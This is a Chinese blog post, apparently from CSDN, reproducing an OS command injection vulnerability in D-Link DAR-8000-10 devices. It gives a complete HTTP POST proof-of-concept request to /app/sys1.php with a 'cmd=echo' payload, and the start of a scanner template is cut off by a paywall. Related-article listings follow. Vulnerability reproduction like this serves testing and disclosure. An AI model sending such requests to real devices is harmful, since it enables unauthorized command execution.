D-Link DAR-8000操作系统命令注入漏洞(含批量验证poc)

已于 2024-04-04 20:44:01 修改
阅读量34 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-04 20:43:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137382033
版权

0x01漏洞描述

D-Link DAR-8000-10版本存在操作系统命令注入漏洞,该漏洞源于文件/app/sys1.php的参数id会导致操作系统命令注入。

0x02漏洞复现

(1)payload利用地址:

/app/sys1.php

(2)命令执行POC:

POST /app/sys1.php HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

cmd=echo+12345111

0x03POC使用(Tscan验证)

params: []
name: D-Link DAR-8000操作系统命令注入漏洞
se
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
D-Link 5个安全漏洞
systemino的博客
08-25 2322
7月早些时间,研究人员爆出D-link 路由器固件镜像泄露了用来加密专用固件二进制文件的密钥。近日,又有ACE 团队研究人员爆出D-Link路由器的5个严重安全漏洞,攻击者利用这些漏洞可以实现网络入侵。此外,由于部分设备已经不再更新,因此无法修复。 漏洞概述 这些漏洞包括反射型XSS攻击、缓冲区溢出漏洞、认证绕过和任意代码执行,分别是: CVE-2020-15892 CVE-2020-15892漏洞是基于栈的缓冲区溢出漏洞漏洞位于ssi 二进制文件中,可能会引发任意命令执行。 CVE-2020-
D-Link DSL-2888A 远程命令执行漏洞(CVE-2020-24581/24579)
qq_17754023的博客
04-29 352
D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在安全漏洞,该漏洞源于包一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。在该版本固件中同时存在着一个不安全认证漏洞(CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。当输入错误密码时链接会跳到http://IP/page/login/login.html?error=fail。修改为poc即可远程执行命令
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 593
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CVE-2024-34527 D-Link DSL-3782命令注入漏洞复现_dsl-3782_a1_eu_1
最新发布
2401_84009749的博客
04-04 334
你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!” />你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!更多资料点击此处获qu!!
dar64-2.6.13-win64.zip
02-22
DAR-磁盘存档 DAR-磁盘存档 用于完整,增量,压缩和加密的备份或存档 DAR是一种命令行备份和存档工具,它使用选择性压缩(不压缩已压缩的文件),强大的加密功能,可以将存档拆分为给定大小的不同文件并提供即时...
CAD快捷键-CAD常用快捷键命令大全.docx
11-15
本文档总结了 CAD 软件中常用的快捷键命令大全,包括绘图命令、修改命令、视窗缩放、尺寸标注、对象特性等多个方面。 一、绘图命令 在 CAD 软件中,绘图命令是最基本也是最重要的命令。通过这些命令,可以快速地...
node-v4.2.4-dar
01-18
node-v4.2.4-darwin-x64(Mac OS X Binaries).tar.gz node-v4.2.4-darwin-x64.tar.gz node.js for Mac OS X Binaries (.tar.gz) 64位 大小: 9.35 MB (9,813,549 字节)
dar64-2.6.9-win64.zip
04-14
标题中的"dar64-2.6.9-win64.zip"表明这是Dar的64位版本,适用于Windows操作系统,且版本号为2.6.9。这个压缩包文件包Dar的可执行程序,用户下载后可以直接在Windows 64位环境下使用。 Dar的主要特点包括: 1. **...
dar64-2.6.5-2-win64.zip
10-05
dar(Disk ARchiver)作为一种强大的文件存档和备份工具,广泛应用于Linux、Unix以及Windows等操作系统。本文将详细介绍dar64-2.6.5-2-win64,这是一个专为Windows用户设计的dar格式查看和解压程序,它使得Windows...
浅谈D-Link系列路由器漏洞挖掘入门
10-02
主要介绍了浅谈D-Link系列路由器漏洞挖掘入门,详细的介绍了D-Link系列的各种漏洞,具有一定的参考价值,有兴趣的可以了解一下
D-Link系列家用路由器漏洞分析总结
Hello World.c
04-27 2167
D-Link系列家用路由器漏洞分析总结 ⚡ 尚未了解清楚 ❗ 已编写好完整POC ❓ 未能编写完整POC ❌ 暂时不能实际验证 DCS-2530L CVE-2020-25078 ❗ 敏感信息泄露 D-Link DCS-1100 || DCS-1130 CVE-2017-8416 ⚡ DIR-850L cgi动态web服务器 CVE-2017-3193 ❗ 认证前栈溢出 CVE-2017-14421 ❗ 路由器后门 DIR-816 独立web服务器 CVE-2021-27114 ❓ 认证后栈溢出 CVE
D-Link RCE漏洞分析
weixin_43137410的博客
09-08 448
漏洞复现 D-Link DCS 密码泄露漏洞
失心少年
06-21 402
D-link DCS是一款网络摄像机,工作温度为0-50℃。D-link DCS系统存在密码泄露漏洞,攻击者通过漏洞可以获取后台权限。1.使用poc进行账号密码查看,得到密码登录即可。
漏洞复现】友讯D-Link路由器弱口令漏洞
晚风不及你
01-27 829
友讯电子设备(上海)有限公司于2002年8月13日成立。公司经营范围包括区内以路由器、网络卡、集线器、交换器、转换器等。
D-Link DIR505路由器溢出漏洞实战
牛叫兽的测试学习和分享
12-14 5085
IOT安全,溢出漏洞学习实践
D-link850路由器漏洞挖掘与利用
weixin_43046297的博客
12-28 1861
D-link850文件结构和各部分功能: 分析小型路由器,D-link850是个经典案例,解析完固件后,首先要搞清楚文件系统,可以从前端入手,追踪其数据流向,看前端对应的后端二进制处理文件。 因此我们系统地梳理一下D-link850存在的相关漏洞及发现过程: 敏感信息泄露: 首先我们不知道漏洞的位置,我们仅通过前端的相关信息进行数据流的追踪: 快捷配置界面:bsc_easysetup.php 但是解析后的系统文件夹内有3处有bsc_easysetup.php(web文件下,webinc的bo.
踏入IOT安全世界:DIR-815路由器多次溢出漏洞分析复现
蚁景网安学院
03-26 903
在进行IOT安全领域的学习和实践中,经典漏洞的复现是必不可少的一环。本文将介绍一个经典漏洞,涉及到Binwalk、firmware-mod-kit、FirmAE等工具的使用,以及对DIR-815路由器中多次溢出漏洞的复现过程。
D-Link DCS系列监控 账号密码信息泄露漏洞
weixin_51387754的博客
11-05 1083
漏洞简介 D-Link DCS-2200是一款监控摄像机,成像色彩为彩色 是一款网络摄像机, 根据VULDB 所看到的信息原文如下 A vulnerability, which was classified as problematic, was found in D-Link DCS-2530L and DCS-2670L (the affected version unknown). This affects some unknown processing of the file /config/get
CMMI-DEV-v1.3 技术批注版:提升软件开发过程
- 决策分析与解决(DAR):进行决策分析,以支持关键决策的制定。 - 供应商协议管理(SAM):管理与供应商相关的合同和协议。 2. 模型实施方法: - 连续表示法(Continuous):关注特定过程域的成熟度,允许组织...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值